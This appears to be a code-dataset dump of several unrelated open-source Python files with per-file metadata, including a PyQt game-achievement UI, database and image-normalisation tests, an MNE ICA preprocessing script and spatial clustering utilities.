self.save2 = QtGui.QPushButton(self.centralwidget)
self.save2.setEnabled(False)
self.save2.setMinimumSize(QtCore.QSize(0, 38))
self.save2.setMaximumSize(QtCore.QSize(416, 16777215))
self.save2.setObjectName("save2")
self.verticalLayout.addWidget(self.save2)
spacerItem1 = QtGui.QSpacerItem(20, 32, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.verticalLayout.addItem(spacerItem1)
self.formLayout = QtGui.QFormLayout()
self.formLayout.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
self.formLayout.setObjectName("formLayout")
self.lbl_coast = QtGui.QLabel(self.centralwidget)
self.lbl_coast.setEnabled(False)
self.lbl_coast.setObjectName("lbl_coast")
self.formLayout.setWidget(1, QtGui.QFormLayout.LabelRole, self.lbl_coast)
self.show_coast = QtGui.QPushButton(self.centralwidget)
self.show_coast.setEnabled(False)
self.show_coast.setObjectName("show_coast")
self.formLayout.setWidget(2, QtGui.QFormLayout.SpanningRole, self.show_coast)
spacerItem2 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(3, QtGui.QFormLayout.SpanningRole, spacerItem2)
self.lbl_urns = QtGui.QLabel(self.centralwidget)
self.lbl_urns.setEnabled(False)
self.lbl_urns.setObjectName("lbl_urns")
self.formLayout.setWidget(4, QtGui.QFormLayout.LabelRole, self.lbl_urns)
self.urns = QtGui.QLabel(self.centralwidget)
self.urns.setText("")
self.urns.setObjectName("urns")
self.formLayout.setWidget(4, QtGui.QFormLayout.FieldRole, self.urns)
self.show_urns = QtGui.QPushButton(self.centralwidget)
self.show_urns.setEnabled(False)
self.show_urns.setObjectName("show_urns")
self.formLayout.setWidget(5, QtGui.QFormLayout.SpanningRole, self.show_urns)
spacerItem3 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(6, QtGui.QFormLayout.SpanningRole, spacerItem3)
self.lbl_heads = QtGui.QLabel(self.centralwidget)
self.lbl_heads.setEnabled(False)
self.lbl_heads.setObjectName("lbl_heads")
self.formLayout.setWidget(7, QtGui.QFormLayout.LabelRole, self.lbl_heads)
self.heads = QtGui.QLabel(self.centralwidget)
self.heads.setObjectName("heads")
self.formLayout.setWidget(7, QtGui.QFormLayout.FieldRole, self.heads)
self.show_heads = QtGui.QPushButton(self.centralwidget)
self.show_heads.setEnabled(False)
self.show_heads.setObjectName("show_heads")
self.formLayout.setWidget(8, QtGui.QFormLayout.LabelRole, self.show_heads)
self.reset_head = QtGui.QPushButton(self.centralwidget)
self.reset_head.setEnabled(False)
self.reset_head.setObjectName("reset_head")
self.formLayout.setWidget(8, QtGui.QFormLayout.FieldRole, self.reset_head)
spacerItem4 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(9, QtGui.QFormLayout.SpanningRole, spacerItem4)
self.lbl_notes = QtGui.QLabel(self.centralwidget)
self.lbl_notes.setEnabled(False)
self.lbl_notes.setObjectName("lbl_notes")
self.formLayout.setWidget(10, QtGui.QFormLayout.LabelRole, self.lbl_notes)
self.notes = QtGui.QLabel(self.centralwidget)
self.notes.setText("")
self.notes.setObjectName("notes")
self.formLayout.setWidget(10, QtGui.QFormLayout.FieldRole, self.notes)
self.reset_notezz = QtGui.QPushButton(self.centralwidget)
self.reset_notezz.setEnabled(False)
self.reset_notezz.setObjectName("reset_notezz")
self.formLayout.setWidget(11, QtGui.QFormLayout.SpanningRole, self.reset_notezz)
spacerItem5 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(12, QtGui.QFormLayout.SpanningRole, spacerItem5)
self.lbl_plants = QtGui.QLabel(self.centralwidget)
self.lbl_plants.setEnabled(False)
self.lbl_plants.setObjectName("lbl_plants")
self.formLayout.setWidget(13, QtGui.QFormLayout.LabelRole, self.lbl_plants)
self.plants = QtGui.QLabel(self.centralwidget)
self.plants.setText("")
self.plants.setObjectName("plants")
self.formLayout.setWidget(13, QtGui.QFormLayout.FieldRole, self.plants)
self.coast = QtGui.QLabel(self.centralwidget)
self.coast.setText("")
self.coast.setObjectName("coast")
self.formLayout.setWidget(1, QtGui.QFormLayout.FieldRole, self.coast)
self.verticalLayout.addLayout(self.formLayout)
spacerItem6 = QtGui.QSpacerItem(20, 32, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.verticalLayout.addItem(spacerItem6)
self.save_map = QtGui.QPushButton(self.centralwidget)
self.save_map.setEnabled(False)
self.save_map.setObjectName("save_map")
self.verticalLayout.addWidget(self.save_map)
spacerItem7 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem7)
self.horizontalLayout_2.addLayout(self.verticalLayout)
self.scrollArea = QtGui.QScrollArea(self.centralwidget)
self.scrollArea.setMinimumSize(QtCore.QSize(768, 0))
self.scrollArea.setBaseSize(QtCore.QSize(1024, 1024))
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 1024, 1024))
self.scrollAreaWidgetContents.setMinimumSize(QtCore.QSize(1024, 1024))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.horizontalLayout_2.addWidget(self.scrollArea)
Miaschiev.setCentralWidget(self.centralwidget)
self.statusBar = QtGui.QStatusBar(Miaschiev)
self.statusBar.setObjectName("statusBar")
Miaschiev.setStatusBar(self.statusBar)
self.retranslateUi(Miaschiev)
QtCore.QMetaObject.connectSlotsByName(Miaschiev)
Miaschiev.setTabOrder(self.install_path, self.install_browse)
Miaschiev.setTabOrder(self.install_browse, self.save_path)
Miaschiev.setTabOrder(self.save_path, self.save_browse)
Miaschiev.setTabOrder(self.save_browse, self.save0)
Miaschiev.setTabOrder(self.save0, self.save1)
Miaschiev.setTabOrder(self.save1, self.save2)
Miaschiev.setTabOrder(self.save2, self.show_coast)
Miaschiev.setTabOrder(self.show_coast, self.show_urns)
Miaschiev.setTabOrder(self.show_urns, self.show_heads)
Miaschiev.setTabOrder(self.show_heads, self.reset_head)
Miaschiev.setTabOrder(self.reset_head, self.reset_notezz)
Miaschiev.setTabOrder(self.reset_notezz, self.scrollArea)
def retranslateUi(self, Miaschiev):
Miaschiev.setWindowTitle(QtGui.QApplication.translate("Miaschiev", "Mias(Achievement)mata", None, QtGui.QApplication.UnicodeUTF8))
self.save_browse.setText(QtGui.QApplication.translate("Miaschiev", "Browse...", None, QtGui.QApplication.UnicodeUTF8))
self.install_browse.setText(QtGui.QApplication.translate("Miaschiev", "Browse...", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("Miaschiev", "Miasmata Saved Games Location:", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Miaschiev", "Miasmata Install Location:", None, QtGui.QApplication.UnicodeUTF8))
self.save0.setText(QtGui.QApplication.translate("Miaschiev", "Load Save Slot 1", None, QtGui.QApplication.UnicodeUTF8))
self.save1.setText(QtGui.QApplication.translate("Miaschiev", "Load Save Slot 2", None, QtGui.QApplication.UnicodeUTF8))
self.save2.setText(QtGui.QApplication.translate("Miaschiev", "Load Save Slot 3", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_coast.setText(QtGui.QApplication.translate("Miaschiev", "Coastline Mapped:", None, QtGui.QApplication.UnicodeUTF8))
self.show_coast.setText(QtGui.QApplication.translate("Miaschiev", "Show Mapped Coastline", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_urns.setText(QtGui.QApplication.translate("Miaschiev", "Urns Lit:", None, QtGui.QApplication.UnicodeUTF8))
self.show_urns.setText(QtGui.QApplication.translate("Miaschiev", "Show Lit Urns", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_heads.setText(QtGui.QApplication.translate("Miaschiev", "Head Statues Located:", None, QtGui.QApplication.UnicodeUTF8))
self.show_heads.setText(QtGui.QApplication.translate("Miaschiev", "Show", None, QtGui.QApplication.UnicodeUTF8))
self.reset_head.setText(QtGui.QApplication.translate("Miaschiev", "Reset one statue...", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_notes.setText(QtGui.QApplication.translate("Miaschiev", "Notes Found:", None, QtGui.QApplication.UnicodeUTF8))
self.reset_notezz.setText(QtGui.QApplication.translate("Miaschiev", "Reset missing Sanchez #1 note...", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_plants.setText(QtGui.QApplication.translate("Miaschiev", "Plants Found:", None, QtGui.QApplication.UnicodeUTF8))
self.save_map.setText(QtGui.QApplication.translate("Miaschiev", "Save current map to file...", None, QtGui.QApplication.UnicodeUTF8))
| 64.082949
| 151
| 0.718898
| 13,615
| 0.979074
| 0
| 0
| 0
| 0
| 0
| 0
| 1,213
| 0.087229
|
774bad54e921796a93026ea0248ace9747a3f917
| 1,673
|
py
|
Python
|
layers/db/db/tests/test_db.py
|
NASA-IMPACT/hls-sentinel2-downloader-serverless
|
e3e4f542fc805c6259f20a6dd932c98cccd4144c
|
[
"Apache-2.0"
] | null | null | null |
layers/db/db/tests/test_db.py
|
NASA-IMPACT/hls-sentinel2-downloader-serverless
|
e3e4f542fc805c6259f20a6dd932c98cccd4144c
|
[
"Apache-2.0"
] | 2
|
2021-07-23T00:49:42.000Z
|
2021-07-23T00:51:25.000Z
|
layers/db/db/tests/test_db.py
|
NASA-IMPACT/hls-sentinel2-downloader-serverless
|
e3e4f542fc805c6259f20a6dd932c98cccd4144c
|
[
"Apache-2.0"
] | null | null | null |
import os
import pytest
from assertpy import assert_that
from ..models.granule import Granule
from ..models.granule_count import GranuleCount
from ..models.status import Status
from ..session import _get_url, get_session, get_session_maker
@pytest.mark.usefixtures("db_connection_secret")
def test_that_db_correctly_gets_db_connection_details():
url = _get_url()
assert_that(url.drivername).is_equal_to("postgresql")
assert_that(url.host).is_equal_to("localhost")
assert_that(url.username).is_equal_to(os.environ["PG_USER"])
assert_that(url.password).is_equal_to(os.environ["PG_PASSWORD"])
assert_that(url.database).is_equal_to(os.environ["PG_DB"])
@pytest.mark.usefixtures("db_connection_secret")
@pytest.mark.usefixtures("db_session")
def test_that_db_can_create_successful_connection_with_granule():
session_maker = get_session_maker()
with get_session(session_maker) as db:
granules = db.query(Granule).all()
assert_that(granules).is_length(0)
@pytest.mark.usefixtures("db_connection_secret")
@pytest.mark.usefixtures("db_session")
def test_that_db_can_create_successful_connection_with_granule_count():
session_maker = get_session_maker()
with get_session(session_maker) as db:
granule_counts = db.query(GranuleCount).all()
assert_that(granule_counts).is_length(0)
@pytest.mark.usefixtures("db_connection_secret")
@pytest.mark.usefixtures("db_session")
def test_that_db_can_create_successful_connection_with_status():
session_maker = get_session_maker()
with get_session(session_maker) as db:
statuses = db.query(Status).all()
assert_that(statuses).is_length(0)
| 35.595745
| 71
| 0.780036
| 0
| 0
| 0
| 0
| 1,419
| 0.848177
| 0
| 0
| 176
| 0.1052
|
774d4b0cb7fee10f0f0fa488de8d167fefa2fbd2
| 1,478
|
py
|
Python
|
dexp/processing/utils/_test/test_normalise.py
|
haesleinhuepf/dexp
|
2ea84f3db323724588fac565fae56f0d522bc5ca
|
[
"BSD-3-Clause"
] | 16
|
2021-04-21T14:09:19.000Z
|
2022-03-22T02:30:59.000Z
|
dexp/processing/utils/_test/test_normalise.py
|
haesleinhuepf/dexp
|
2ea84f3db323724588fac565fae56f0d522bc5ca
|
[
"BSD-3-Clause"
] | 28
|
2021-04-15T17:43:08.000Z
|
2022-03-29T16:08:35.000Z
|
dexp/processing/utils/_test/test_normalise.py
|
haesleinhuepf/dexp
|
2ea84f3db323724588fac565fae56f0d522bc5ca
|
[
"BSD-3-Clause"
] | 3
|
2022-02-08T17:41:30.000Z
|
2022-03-18T15:32:27.000Z
|
import numpy as np
import pytest
from arbol import aprint
from dexp.processing.utils.normalise import Normalise
from dexp.utils.backends import Backend
from dexp.utils.testing.testing import execute_both_backends
@execute_both_backends
@pytest.mark.parametrize(
"dexp_nuclei_background_data",
[dict(length_xy=128, dtype=np.float32)],
indirect=True,
)
def test_normalise(dexp_nuclei_background_data):
_, _, image = dexp_nuclei_background_data
image = image.astype(np.uint16) # required to convert afterwards
normalise = Normalise(image, low=-0.5, high=1, in_place=False, clip=True, dtype=np.float32)
image_normalised = normalise.forward(image)
image_denormalised = normalise.backward(image_normalised)
assert image_normalised.dtype == np.float32
assert image_denormalised.dtype == image.dtype
assert image_normalised.shape == image.shape
assert image_denormalised.shape == image.shape
assert image_normalised.min() >= -0.5
assert image_normalised.max() <= 1
assert image_normalised.max() - image_normalised.min() >= 1.5
assert image_denormalised.min() * (1 + 1e-3) >= image.min()
assert image_denormalised.max() <= (1 + 1e-3) * image.max()
assert (image_denormalised.max() - image_denormalised.min()) * (1 + 1e-3) >= image.max() - image.min()
xp = Backend.get_xp_module()
error = xp.median(xp.abs(image - image_denormalised)).item()
aprint(f"Error = {error}")
assert error < 1e-6
| 34.372093
| 106
| 0.725981
| 0
| 0
| 0
| 0
| 1,261
| 0.85318
| 0
| 0
| 79
| 0.053451
|
774ee32b7bd61777145b97c33929e59c467687c5
| 64
|
py
|
Python
|
pyCameras/__init__.py
|
imr-luh/pyCameras
|
30fc220022b0562f5244d9fd5f436b8630abe4cd
|
[
"MIT"
] | 2
|
2019-05-10T08:43:38.000Z
|
2019-05-17T16:00:13.000Z
|
pyCameras/__init__.py
|
imr-luh/pyCameras
|
30fc220022b0562f5244d9fd5f436b8630abe4cd
|
[
"MIT"
] | null | null | null |
pyCameras/__init__.py
|
imr-luh/pyCameras
|
30fc220022b0562f5244d9fd5f436b8630abe4cd
|
[
"MIT"
] | 2
|
2020-03-10T17:15:08.000Z
|
2020-04-24T09:02:21.000Z
|
__version__ = '0.0.1'
from . import utils
from .utils import *
| 12.8
| 21
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 0.109375
|
774f04287f666d1e053a72b91ac8437dc815a95d
| 427
|
py
|
Python
|
sdfspu/sdf_net.py
|
soundmaking/sdfspu
|
164af2602d07b18c45a8182cd5e9638628c7e165
|
[
"MIT"
] | null | null | null |
sdfspu/sdf_net.py
|
soundmaking/sdfspu
|
164af2602d07b18c45a8182cd5e9638628c7e165
|
[
"MIT"
] | null | null | null |
sdfspu/sdf_net.py
|
soundmaking/sdfspu
|
164af2602d07b18c45a8182cd5e9638628c7e165
|
[
"MIT"
] | null | null | null |
import socket
def get_ip():
# https://stackoverflow.com/a/28950776/9471339
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
if __name__ == "__main__":
print('IP via get_ip():\t', get_ip())
| 21.35
| 56
| 0.58548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 138
| 0.323185
|
775087ff0c58dbd29b82c1af2c4f5dcf0ce17d5d
| 844
|
py
|
Python
|
pysparkling/sql/expressions/literals.py
|
ptallada/pysparkling
|
f0e8e8d039f3313c2693b7c7576cb1b7ba5a6d78
|
[
"Apache-2.0"
] | 260
|
2015-05-11T18:08:44.000Z
|
2022-01-15T13:19:43.000Z
|
pysparkling/sql/expressions/literals.py
|
ptallada/pysparkling
|
f0e8e8d039f3313c2693b7c7576cb1b7ba5a6d78
|
[
"Apache-2.0"
] | 79
|
2015-06-02T09:53:25.000Z
|
2021-09-26T11:18:18.000Z
|
pysparkling/sql/expressions/literals.py
|
ptallada/pysparkling
|
f0e8e8d039f3313c2693b7c7576cb1b7ba5a6d78
|
[
"Apache-2.0"
] | 50
|
2015-06-06T17:00:58.000Z
|
2022-01-15T13:19:18.000Z
|
from ..utils import AnalysisException
from .expressions import Expression
class Literal(Expression):
def __init__(self, value):
super().__init__()
self.value = value
def eval(self, row, schema):
return self.value
def __str__(self):
if self.value is True:
return "true"
if self.value is False:
return "false"
if self.value is None:
return "NULL"
return str(self.value)
def get_literal_value(self):
if hasattr(self.value, "expr") or isinstance(self.value, Expression):
raise AnalysisException("Value should not be a Column or an Expression,"
f" but got {type(self)}: {self}")
return self.value
def args(self):
return (self.value, )
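# Editorial usage sketch (not part of the original pysparkling source): a Literal
# ignores the row and schema it is evaluated against and renders SQL-style
# NULL/true/false when printed. Illustrative only.
def _literal_examples():
    assert Literal(42).eval(row=None, schema=None) == 42
    assert str(Literal(None)) == "NULL"
    assert str(Literal(True)) == "true"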
__all__ = ["Literal"]
| 25.575758
| 84
| 0.582938
| 743
| 0.880332
| 0
| 0
| 0
| 0
| 0
| 0
| 114
| 0.135071
|
7750af67ab2df68b6c19d4aa9f6c7f583c889749
| 3,812
|
py
|
Python
|
filter_ICA.py
|
MadsJensen/RP_scripts
|
b3f7afb27b6346ee209e4bfcd7d52049d69d2eaf
|
[
"BSD-3-Clause"
] | null | null | null |
filter_ICA.py
|
MadsJensen/RP_scripts
|
b3f7afb27b6346ee209e4bfcd7d52049d69d2eaf
|
[
"BSD-3-Clause"
] | null | null | null |
filter_ICA.py
|
MadsJensen/RP_scripts
|
b3f7afb27b6346ee209e4bfcd7d52049d69d2eaf
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 8 14:45:02 2014.
@author: mje
"""
import mne
import sys
from mne.io import Raw
from mne.preprocessing import ICA, create_eog_epochs, create_ecg_epochs
import matplotlib
matplotlib.use('Agg')
from my_settings import *
subject = sys.argv[1]
# SETTINGS
n_jobs = 1
l_freq, h_freq = 1, 95 # High and low frequency setting for the band pass
n_freq = 50 # notch filter frequency
decim = 4 # decim value
for condition in conditions:
raw = Raw(mf_autobad_off_folder + "%s_%s_mc_tsss-raw.fif" %
(subject, condition),
preload=True)
raw.drop_channels(raw.info["bads"])
raw.notch_filter(n_freq, n_jobs=n_jobs)
raw.filter(l_freq, None, n_jobs=n_jobs)
raw.save(
mf_autobad_off_folder + "%s_%s_filtered_mc_tsss-raw.fif" %
(subject, condition),
overwrite=True)
# ICA Part
ica = ICA(n_components=0.99, method='fastica', max_iter=512)
picks = mne.pick_types(
raw.info,
meg=True,
eeg=False,
eog=False,
emg=False,
stim=False,
exclude='bads')
ica.fit(raw, picks=picks, decim=decim, reject=reject_params)
# maximum number of components to reject
n_max_eog = 1
n_max_ecg = 3
##########################################################################
# 2) identify bad components by analyzing latent sources.
# DETECT EOG BY CORRELATION
# HORIZONTAL EOG
title = "ICA: %s for %s"
    eog_epochs = create_eog_epochs(raw, ch_name="EOG002")  # TODO: check EOG channel name
    eog_average = eog_epochs.average()
eog_inds, scores = ica.find_bads_eog(raw)
eog_inds = eog_inds[:n_max_eog]
ica.exclude += eog_inds
if eog_inds:
fig = ica.plot_scores(
scores, exclude=eog_inds, title=title % ('eog', subject))
fig.savefig(ica_folder + "plots/%s_%s_eog_scores_2.png" % (subject,
condition))
fig = ica.plot_sources(eog_average, exclude=eog_inds)
fig.savefig(ica_folder + "plots/%s_%s_eog_source_2.png" % (subject,
condition))
fig = ica.plot_components(
eog_inds, title=title % ('eog', subject), colorbar=True)
fig.savefig(ica_folder + "plots/%s_%s_eog_component_2.png" % (
subject, condition))
fig = ica.plot_overlay(eog_average, exclude=eog_inds, show=False)
fig.savefig(ica_folder + "plots/%s_%s_eog_excluded_2.png" % (
subject, condition))
del eog_epochs, eog_average
# ECG
ecg_epochs = create_ecg_epochs(raw, tmin=-.5, tmax=.5)
ecg_inds, scores = ica.find_bads_ecg(ecg_epochs)
ecg_inds = ecg_inds[:n_max_ecg]
ica.exclude.extend(ecg_inds)
if ecg_inds:
fig = ica.plot_components(
ecg_inds, title=title % ('ecg', subject), colorbar=True)
fig.savefig(ica_folder + "plots/%s_%s_ecg_component_2.png" % (
subject, condition))
fig = ica.plot_overlay(raw, exclude=ecg_inds, show=False)
fig.savefig(ica_folder + "plots/%s_%s_ecg_excluded_2.png" % (
subject, condition))
fig = ica.plot_properties(raw, picks=ecg_inds)
fig[0].savefig(ica_folder + "plots/%s_%s_plot_properties_2.png" % (
subject, condition))
##########################################################################
# Apply the solution to Raw, Epochs or Evoked like this:
raw_ica = ica.apply(raw)
ica.save(ica_folder + "%s_%s-ica_2.fif" % (subject, condition)) # save ICA
    # components
# Save raw with ICA removed
raw_ica.save(
ica_folder + "%s_%s_ica-raw.fif" % (subject, condition),
overwrite=True)
| 32.033613
| 79
| 0.594439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,000
| 0.262329
|
77526fa74a8b3626dd46cca703ea3aecf100938a
| 428
|
py
|
Python
|
typish/_types.py
|
georgeharker/typish
|
1c043beb74d89e62b10339a2a964f60ec175adfa
|
[
"MIT"
] | 16
|
2019-08-03T13:57:17.000Z
|
2021-11-08T11:51:52.000Z
|
typish/_types.py
|
georgeharker/typish
|
1c043beb74d89e62b10339a2a964f60ec175adfa
|
[
"MIT"
] | 27
|
2019-09-11T13:24:38.000Z
|
2022-02-11T07:04:12.000Z
|
typish/_types.py
|
georgeharker/typish
|
1c043beb74d89e62b10339a2a964f60ec175adfa
|
[
"MIT"
] | 7
|
2019-11-18T16:50:09.000Z
|
2021-11-01T14:34:39.000Z
|
"""
PRIVATE MODULE: do not import (from) it directly.
This module contains types that are not available by default.
"""
import typing
from inspect import Parameter
T = typing.TypeVar('T')
KT = typing.TypeVar('KT')
VT = typing.TypeVar('VT')
Empty = Parameter.empty
Unknown = type('Unknown', (Empty, ), {})
Module = type(typing)
NoneType = type(None)
Ellipsis_ = type(...) # Use EllipsisType instead.
EllipsisType = type(...)
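# Editorial usage sketch (not part of the original module): Empty and Unknown are
# sentinel types rather than values; a typical use is checking inspected signature
# defaults. The helper below is illustrative only.
def _params_without_default(func):
    from inspect import signature
    # names of parameters of `func` that have no default value
    return [name for name, p in signature(func).parameters.items() if p.default is Empty]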
| 22.526316
| 61
| 0.703271
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 167
| 0.390187
|
7752a70c09c370c66d0c734d9856294edf75f0f4
| 11,172
|
py
|
Python
|
avidaspatial/transform_data.py
|
emilydolson/avida-spatial-tools
|
7beb0166ccefad5fa722215b030ac2a53d62b59e
|
[
"MIT"
] | 1
|
2018-06-12T18:31:40.000Z
|
2018-06-12T18:31:40.000Z
|
avidaspatial/transform_data.py
|
emilydolson/avida-spatial-tools
|
7beb0166ccefad5fa722215b030ac2a53d62b59e
|
[
"MIT"
] | 1
|
2016-02-03T23:37:09.000Z
|
2016-02-03T23:37:09.000Z
|
avidaspatial/transform_data.py
|
emilydolson/avida-spatial-tools
|
7beb0166ccefad5fa722215b030ac2a53d62b59e
|
[
"MIT"
] | null | null | null |
from .utils import *
from scipy.spatial.distance import pdist
import scipy.cluster.hierarchy as hierarchicalcluster
def rank_environment_and_phenotypes(environment, phenotypes, k=15):
"""
Clusters sets of resources/tasks using a weighted hamming distance such
that you can have few enough values to give each group of similar things a
different color. This function is designed for cases when you want to
color both an environment and a set of phenotypes such that the colors
    correspond to each other.
Takes an EnvironmentFile object, a 2d array of phenotypes, and, optionally,
a number indicating the maximum number of clusters (default 15).
Returns:
- An EnvironmentFile in which the grid has been replaced with integers
indicating which cluster a cell is a member of. Integers are assigned
such that cells containing more or more complex resources have higher
numbers.
- A 2D grid of numbers representing the clusters each phenotype was
assigned to.
- An integer representing the total number of clusters.
"""
environment = convert_world_to_phenotype(environment)
ranks = get_ranks_for_environment_and_phenotypes(environment, phenotypes)
environment, n = assign_ranks_by_cluster(environment, k, ranks)
phenotypes, n = assign_ranks_by_cluster(phenotypes, k, ranks)
return environment, phenotypes, n
def do_clustering(types, max_clust):
"""
Helper method for clustering that takes a list of all of the things being
clustered (which are assumed to be binary numbers represented as strings),
and an int representing the maximum number of clusters that are allowed.
Returns: A dictionary mapping cluster ids to lists of numbers that are part
of that cluster.
"""
# Fill in leading zeros to make all numbers same length.
ls = [list(t[t.find("b")+1:]) for t in types]
prepend_zeros_to_lists(ls)
dist_matrix = pdist(ls, weighted_hamming)
clusters = hierarchicalcluster.complete(dist_matrix)
clusters = hierarchicalcluster.fcluster(clusters, max_clust,
criterion="maxclust")
# Group members of each cluster together
cluster_dict = dict((c, []) for c in set(clusters))
for i in range(len(types)):
cluster_dict[clusters[i]].append(types[i])
return cluster_dict
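# Editorial sketch (not part of the original module): a small convenience wrapper
# showing the expected input format for do_clustering -- binary numbers as strings
# plus a cluster budget -- and summarising the result as cluster sizes.
def _cluster_summary(types, max_clust):
    cluster_dict = do_clustering(types, max_clust)
    # e.g. {1: 2, 2: 1} would mean cluster 1 has two members and cluster 2 has one
    return {cluster_id: len(members) for cluster_id, members in cluster_dict.items()}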
def rank_clusters(cluster_dict):
"""
Helper function for clustering that takes a dictionary mapping cluster
ids to lists of the binary strings that are part of that cluster and
returns a dictionary mapping cluster ids to integers representing their
"rank". Ranks provide an ordering for the clusters such that each
cluster has its own rank, and clusters are ordered from simplest to
most complex.
"""
# Figure out the relative rank of each cluster
cluster_ranks = dict.fromkeys(cluster_dict.keys())
for key in cluster_dict:
cluster_ranks[key] = eval(string_avg(cluster_dict[key], binary=True))
i = len(cluster_ranks)
for key in sorted(cluster_ranks, key=cluster_ranks.get):
cluster_ranks[key] = i
i -= 1
return cluster_ranks
def get_ranks_for_environment_and_phenotypes(environment, phenotypes, k=15):
"""
    Takes an EnvironmentFile and a 2d array representing phenotypes at each
location. Optionally also takes an integer indicating the maximum number
of clusters allowed to be created (default 15).
Environment is expected to already have been converted to binary numbers
(generally because this is being called by rank_environment_and_phenotypes)
Return a dictionary mapping binary strings representing groups of
resources/tasks that are present/performed in a given cell to integers
indicating the ranked order of the cluster they're part of.
"""
# Create list of all niches and all phenotypes, in phenotype format
niches = flatten_array(environment)
phenotypes = flatten_array(phenotypes)
types = set(phenotypes+niches)
types.discard("-0b1") # We'll handle this specially
types.discard("0b0") # We'll handle this specially
# Do all clustering ahead of time so colors remain consistent.
ranks = generate_ranks(list(types), k)
ranks["-0b1"] = -1 # The empty phenotype/niche should always be rank -1
ranks["0b0"] = 0 # The empty phenotype/niche should always be rank 0
return ranks
def assign_ranks_by_cluster(grid, n, ranks=None):
"""
Takes a 2D array representing phenotypes or resource sets across the world,
    an integer representing the maximum number of clusters allowed, and
optionally a dictionary indicating the rank of the cluster of each
phenotype/resource set. If this dictionary is not provided, one will be
generated.
Returns: - A 2d array of numbers indicating the ranks of the clusters
of the resource set/phenotype in each cell
- An integer representing the number of clusters created.
"""
if ranks is None:
ranks = generate_ranks(grid, n)
return assign_ranks_to_grid(grid, ranks), len(ranks)
def generate_ranks(grid, n):
"""
Takes a grid of phenotypes or resource sets representing as strings
representing binary numbers, and an integer indicating the maximum number
of clusters to generated.
Clusters the data in grid into a maximum of n groups, ranks each group by
the complexity and length of its "average" member, and returns a dictionary
mapping binary numbers to integers representing the rank of the cluster
they're part of.
"""
phenotypes = deepcopy(grid)
if type(phenotypes) is list and type(phenotypes[0]) is list:
phenotypes = flatten_array(phenotypes)
# Remove duplicates from types
types = list(frozenset(phenotypes))
if len(types) < n:
ranks = rank_types(types)
else:
ranks = cluster_types(types, n)
return ranks
def assign_ranks_to_grid(grid, ranks):
"""
Takes a 2D array of binary numbers represented as strings and a dictionary
mapping binary strings to integers representing the rank of the cluster
they belong to, and returns a grid in which each binary number has been
replaced with the rank of its cluster.
"""
assignments = deepcopy(grid)
ranks["0b0"] = 0
ranks["-0b1"] = -1
for i in range(len(grid)):
for j in range(len(grid[i])):
if type(grid[i][j]) is list:
for k in range(len(grid[i][j])):
assignments[i][j][k] = ranks[grid[i][j][k]]
else:
assignments[i][j] = ranks[grid[i][j]]
return assignments
def cluster_types(types, max_clust=12):
"""
Generates a dictionary mapping each binary number in types to an integer
from 0 to max_clust. Hierarchical clustering is used to determine which
which binary numbers should map to the same integer.
"""
if len(types) < max_clust:
max_clust = len(types)
# Do actual clustering
cluster_dict = do_clustering(types, max_clust)
cluster_ranks = rank_clusters(cluster_dict)
# Create a dictionary mapping binary numbers to indices
ranks = {}
for key in cluster_dict:
for typ in cluster_dict[key]:
ranks[typ] = cluster_ranks[key]
return ranks
def rank_types(types):
"""
Takes a list of binary numbers and returns a dictionary mapping each
    binary number to an integer indicating its rank within the list.
This is basically the better alternative to cluster_types, that works
in that perfect world where we have few enough types to represent each
as its own color.
"""
include_null = '0b0' in types
sorted_types = deepcopy(types)
for i in range(len(sorted_types)):
sorted_types[i] = int(sorted_types[i], 2)
sorted_types.sort()
ranks = {}
for t in types:
ranks[t] = sorted_types.index(eval(t)) + int(not include_null)
return ranks
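# Worked example (sketch): with no empty phenotype present, ranks start at 1,
# ordered by the integer value of the binary strings:
#
#     rank_types(["0b11", "0b1"])   # -> {"0b1": 1, "0b11": 2}
#     rank_types(["0b0", "0b1"])    # -> {"0b0": 0, "0b1": 1}  (null phenotype keeps rank 0)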
def make_count_grid(data):
"""
Takes a 2 or 3d grid of strings representing binary numbers.
Returns a grid of the same dimensions in which each binary number has been
replaced by an integer indicating the number of ones that were in that
number.
"""
data = deepcopy(data)
for i in range(len(data)):
for j in range(len(data[i])):
for k in range(len(data[i][j])):
if type(data[i][j][k]) is list:
for l in range(len(data[i][j][k])):
try:
data[i][j][k] = data[i][j][k][l].count("1")
except:
data[i][j][k] = len(data[i][j][k][l])
else:
try:
data[i][j][k] = data[i][j][k].count("1")
except:
data[i][j][k] = len(data[i][j][k])
